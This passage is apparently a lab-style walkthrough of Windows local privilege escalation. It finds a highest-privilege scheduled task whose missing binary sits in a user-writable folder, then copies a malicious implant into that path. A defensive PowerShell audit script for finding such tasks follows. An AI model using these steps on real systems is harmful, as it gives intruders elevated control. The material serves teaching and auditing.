First: Let’s list the scheduled tasks and look for ones whose binary is missing

Autorunsc64.exe -a t | more

Second: Let’s get more information about that task

schtasks /query /tn OneDriveChk /xml

Notice that the task runs as this user with the Highest Privilege, and that the output also gives us the path of its binary

Third: Let’s check if we can write to that path

icacls C:\RTO\bin\

And yes, we have Modify access

Fourth: Copy our malicious payload to that folder

copy C:\Users\IEUser\Desktop\LPE\implant\implant.exe C:\RTO\bin\OneDriveChk.exe
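
The same conditions can be checked across every task as a defensive audit. The PowerShell below is an added example, not part of the original write-up: it reports scheduled tasks whose executable is missing or sits in a directory that principals outside a trusted list can write to. The $trusted list and the Get-WritableAce helper name are assumptions made for this illustration.

```powershell
# Added audit example (not from the original post). Run from an elevated
# PowerShell session so every task and ACL is readable.
$trusted = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
           'NT SERVICE\TrustedInstaller', 'CREATOR OWNER'  # assumption: adjust to your baseline
$writeBits = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData'

function Get-WritableAce {
    param([string]$Dir)
    # Allow ACEs that let a non-trusted principal create or modify files in $Dir.
    # ACEs stored as raw generic masks (shown as numbers) are not decoded here.
    (Get-Acl -LiteralPath $Dir).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.FileSystemRights -band $writeBits) -and
        $trusted -notcontains $_.IdentityReference.Value
    }
}

foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # skip COM-handler actions
        $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
        if (-not [IO.Path]::IsPathRooted($exe)) { continue }  # bare names resolve via PATH; not covered
        $dir     = Split-Path -Path $exe -Parent
        $missing = -not (Test-Path -LiteralPath $exe -PathType Leaf)
        $aces    = if (Test-Path -LiteralPath $dir) { @(Get-WritableAce $dir) } else { @() }
        if ($missing -or $aces.Count) {
            [pscustomobject]@{
                Task       = $task.TaskPath + $task.TaskName
                RunAs      = $task.Principal.UserId
                RunLevel   = $task.Principal.RunLevel   # 'Highest' matches the case above
                Binary     = $exe
                Missing    = $missing
                WritableBy = ($aces.IdentityReference.Value | Sort-Object -Unique) -join '; '
            }
        }
    }
}
```

Rows with RunLevel Highest that are either Missing or have a non-empty WritableBy are the ones to fix first, by tightening the directory ACL or removing the stale task.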